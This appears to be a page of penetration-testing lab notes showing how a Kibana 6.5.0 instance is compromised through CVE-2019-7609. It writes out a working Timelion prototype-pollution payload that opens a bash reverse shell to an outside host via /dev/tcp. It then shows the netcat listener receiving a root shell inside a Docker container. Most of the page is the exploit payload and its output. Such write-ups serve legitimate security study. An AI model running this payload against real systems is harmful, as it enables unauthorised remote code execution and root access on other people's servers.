3 :5601 kibana 6.5.0

http://192.168.197.54:5601
Kibana Landing Page

# Under Management > 
http://192.168.197.54:5601/app/kibana#/management?_g=()
Version: 6.5.0

# Found exploit
https://github.com/mpgn/CVE-2019-7609

Timelion >
CMD: .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/192.168.49.134/3306 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

$ nc -lvnp 3306
listening on [any] 3306 ...
connect to [192.168.49.134] from (UNKNOWN) [192.168.134.54] 43556
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@0873e8062560:/# whoami;id;hostname
whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
0873e8062560

# definitely a docker system

Previous4 docker breakout > root Next2 :80 php calculator

Last updated 2 years ago